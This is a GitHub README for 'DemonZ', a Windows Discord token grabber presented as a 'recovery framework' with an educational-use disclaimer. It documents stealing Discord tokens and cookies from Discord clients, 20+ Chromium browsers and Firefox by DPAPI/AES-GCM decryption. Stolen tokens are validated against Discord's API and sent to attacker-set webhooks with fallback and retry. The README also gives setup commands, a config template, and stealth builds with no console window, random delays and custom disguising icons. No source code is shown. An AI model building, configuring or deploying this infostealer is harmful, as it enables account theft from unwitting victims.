Skip to content

itzzkirito/Token-Grabber

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

4 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

πŸ”₯ DemonZ

Advanced Discord Token Recovery Framework

Python Windows License Release


⚠️ LEGAL DISCLAIMER This software is intended exclusively for educational purposes and authorized security research. Unauthorized access to computer systems is a criminal offense under the Computer Fraud and Abuse Act (CFAA) and equivalent legislation worldwide. The author assumes zero liability for any misuse. By using this tool, you accept full responsibility and confirm you have explicit written authorization for any systems tested.


🧬 Architecture

DemonZ/
β”œβ”€β”€ DemonZ.py          # Core engine β€” token extraction & validation
β”œβ”€β”€ builder.py         # Build system β€” PyInstaller packaging & icon support
β”œβ”€β”€ config.json        # Runtime configuration
β”œβ”€β”€ setup.py           # Dependency installer
β”œβ”€β”€ build.bat          # Interactive build & run menu
β”œβ”€β”€ run.bat            # Quick-launch script
β”œβ”€β”€ requirements.txt   # Pinned dependencies
β”œβ”€β”€ GUIDE.md           # Complete usage documentation
└── LICENSE            # GNU GPL v2.0

✨ Feature Matrix

Category Feature Details
Extraction Chromium token decryption AES-GCM via DPAPI master key
Unencrypted token scanning Regex pattern matching across LevelDB
Cookie-based extraction Discord session cookies from SQLite
Firefox support SQLite profile scanning
Targets Discord clients Standard, Canary, PTB, Lightcord
Chromium browsers (16+) Chrome, Edge, Brave, Opera, Vivaldi, Yandex, Amigo, Torch, Kometa, Orbitum, CentBrowser, 7Star, Sputnik, Epic, Uran, Iridium
Firefox All profile directories
Performance Parallel scanning Threaded platform enumeration
Parallel validation ThreadPoolExecutor with configurable worker count
Key caching Encryption keys cached per-path, zero redundant DPAPI calls
O(1) deduplication Set-based token dedup before validation
Delivery Webhook dispatch Discord webhook with embedded rich data
Fallback webhooks Ordered list; automatic cascade on failure
Retry logic Configurable attempt count & backoff delay
Local backup Timestamped plaintext file with full token metadata
Stealth Random I/O delays Configurable min/max range per file read
Silent mode Suppresses all console output below ERROR
No-console build PyInstaller --noconsole stealth executable
Build Custom EXE icon URL or local .ico path β€” auto-downloads & converts from imgur
Bundled config config.json embedded via --add-data
One-file packaging Single portable .exe via PyInstaller
Config JSON configuration All behavior tunable at runtime
CLI overrides --dry-run, --silent, --config flags
Validation engine Pre-flight config checks with actionable error messages

πŸš€ Quick Start

1 Β· Install

# Automatic (recommended)
python setup.py

# Manual
pip install pypiwin32 pycryptodome

2 Β· Configure

Edit config.json β€” at minimum, set your webhook:

{
    "webhook_urls": [
        "https://discord.com/api/webhooks/YOUR_ID/YOUR_TOKEN"
    ]
}

3 Β· Run

python DemonZ.py              # Standard execution
python DemonZ.py --dry-run    # Test mode (no webhook delivery)
python DemonZ.py --silent     # Suppress console output

Or double-click build.bat for the interactive menu.


βš™οΈ Configuration Reference

config.json

{
    "webhook_urls": ["https://discord.com/api/webhooks/PRIMARY", "https://...BACKUP"],
    "avatar_url": "https://i.imgur.com/HmoE29J.png",
    "embed_color": 1752220,
    "timeout": 10,
    "silent_mode": false,
    "dry_run": false,
    "save_to_file": true,
    "backup_file": "tokens_backup.txt",
    "max_threads": 20,
    "random_delays": true,
    "min_delay": 0.01,
    "max_delay": 0.05,
    "webhook_retry_count": 3,
    "webhook_retry_delay": 2.0,
    "exe_icon": "https://imgur.com/HmoE29J"
}
Parameter Type Default Description
webhook_urls string[] [""] Ordered webhook URLs β€” tries sequentially on failure
avatar_url string β€” Webhook avatar image URL
embed_color int 1752220 Embed sidebar color (decimal)
timeout int 10 HTTP request timeout (seconds)
silent_mode bool false Suppress all INFO-level logging
dry_run bool false Log payloads without sending to webhooks
save_to_file bool true Write token data to local backup
backup_file string tokens_backup.txt Backup file path
max_threads int 20 Max parallel token validation workers
random_delays bool true Insert random delays between file I/O
min_delay float 0.01 Minimum delay in seconds
max_delay float 0.05 Maximum delay in seconds
webhook_retry_count int 3 Retry attempts per webhook URL
webhook_retry_delay float 2.0 Seconds between retry attempts
exe_icon string NONE EXE icon β€” URL (auto-converted) or local .ico path

CLI Flags

Flag Effect
--config <path> Load alternate config file
--dry-run Override dry_run to true
--silent Override silent_mode to true
--help Display usage information

πŸ“¦ Building Executables

Interactive Build

build.bat β†’ Option [5] Build Executable
build.bat β†’ Option [6] Build Executable (Stealth β€” no console window)

CLI Build

python builder.py              # Standard build
python builder.py --stealth    # No-console build

Custom Icon

Set exe_icon in config.json:

{
    "exe_icon": "https://imgur.com/HmoE29J"
}

The builder accepts:

  • Imgur page URLs β€” auto-converts imgur.com/ID β†’ i.imgur.com/ID.png
  • Direct image URLs β€” any .png, .jpg, .bmp
  • Local .ico files β€” used directly

Output: dist/DemonZ.exe (or dist/DemonZ_Stealth.exe)


πŸ“Š Execution Flow

β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”     β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”     β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”     β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”‚ Load Config  │────▢│ Scan Targets │────▢│ Deduplicate   │────▢│ Validate     β”‚
β”‚ + Validate   β”‚     β”‚ (Threaded)   β”‚     β”‚ Tokens (O(1)) β”‚     β”‚ (Parallel)   β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜     β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜     β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜     β””β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”˜
                                                                       β”‚
                                                              β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β–Όβ”€β”€β”€β”€β”€β”€β”€β”€β”
                                                              β”‚ Deliver Results  β”‚
                                                              β”‚ Webhook + Backup β”‚
                                                              β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

Scan targets are enumerated in parallel β€” one thread per platform (Discord, Chrome, Edge, etc.). Found tokens are deduplicated via set(), then validated against discord.com/api/v9/users/@me using a ThreadPoolExecutor. Valid tokens are delivered to webhooks with automatic retry and saved to the backup file.


πŸ”’ Supported Targets

Discord Clients

Discord Β· Discord Canary Β· Discord PTB Β· Lightcord

Chromium-Based Browsers

Chrome Β· Chrome SxS Β· Edge Β· Brave Β· Opera Β· Opera GX Β· Vivaldi Β· Yandex Β· Amigo Β· Torch Β· Kometa Β· Orbitum Β· CentBrowser Β· 7Star Β· Sputnik Β· Epic Privacy Browser Β· Uran Β· Iridium

Other

Firefox (all profiles)


πŸ“‚ Dependencies

Package Version Purpose
pypiwin32 β‰₯ 223 Windows DPAPI (win32crypt) for key decryption
pycryptodome β‰₯ 3.23.0 AES-GCM token decryption
pyinstaller β‰₯ 6.17.0 Executable packaging
Pillow β‰₯ 10.0.0 Icon image conversion for builds

πŸ“„ License

Licensed under the GNU General Public License v2.0 β€” see LICENSE.


πŸ‘€ Author

Itzzkirito β€” DemonZ


πŸ“š Documentation

Document Description
GUIDE.md Complete step-by-step usage and configuration guide
config.json Runtime configuration reference
LICENSE Full license text

πŸ’€ DemonZ β€” Built by Itzzkirito
For educational and authorized security research only.

About

Advanced Discord token recovery framework for Windows. Extracts tokens from 20+ Chromium browsers, Firefox, and Discord clients via AES-GCM/DPAPI decryption. Features parallel validation, webhook delivery with fallback, stealth mode, custom EXE icon builds, and full JSON configuration.

Topics

Resources

License

Stars

0 stars

Watchers

0 watching

Forks

Packages

 
 
 

Contributors